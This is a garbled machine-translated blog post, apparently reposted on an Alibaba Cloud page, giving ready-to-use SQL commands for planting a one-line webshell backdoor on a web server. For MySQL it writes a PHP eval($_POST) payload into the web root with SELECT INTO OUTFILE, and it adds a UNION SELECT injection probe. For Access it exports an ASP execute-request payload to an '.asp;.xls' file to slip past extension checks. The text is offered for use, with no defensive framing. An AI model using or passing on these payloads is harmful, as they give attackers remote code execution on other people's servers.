Mysql/access export a sentence take Webshell back door command

Source: Internet
Author: User

Mysql:

Drop TABLE IF EXISTS temp; Delete if temp is present
Create TABLE Temp (cmd text not NULL); Create a temp table with a CMD field inside it
Insert into temp (cmd) VALUES (<? PHP eval ($_post[cmd));? >); Insert a word trojan into the temp table
Select cmd from temp to out file f:/wwwroot/eval.php; Query a sentence in the Temp table and import the results into eval.php
Drop TABLE IF EXISTS temp; Remove temp (Wipe butt O (∩_∩) o ...)

The SQL is simple, I made a simple comment.
But consider that we often use the following statements when testing the SQL vulnerability of PHP:

/**/union SELECT 1,2,3,4,5,6,7,8,9,10,11,12/*

Then the returned page may appear with a number between 1~12. The addition of the number 3 is shown here.
If we change the above sentence to/**/union SELECT 1,2,zerosoul,4,5,6,7,8,9,10,11,12/*, the Zerosoul will be displayed where the page last displayed 3.
That is, if our SELECT statement is not followed by a from table statement, we say that the queried number or character is returned directly to the query results.


In that case, why do we have to be so troublesome to build a table, import data First, and then export such a toss.

With this idea, the above large paragraph to a sentence of the SQL code can be directly simplified to a sentence:

Select <? PHP eval ($_post[cmd]);? > into outfile f:/wwwroot/eval.php;

This is not only straightforward, but also avoids the accidental deletion of other people's data.


ACCESS:

Create table cmd (a varchar (50))
Insert into cmd (a) VALUES (' <%execute request ("s")%> ')
SELECT * into [a] in ' E:\wz\ysnews1\a.asp;. XLS ' Excel 4.0; ' from cmd
drop table cmd

This article is from the "Tree's blog" blog, please be sure to keep this source http://shuzi.blog.51cto.com/3685900/1594053

Mysql/access export a sentence take Webshell back door command

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.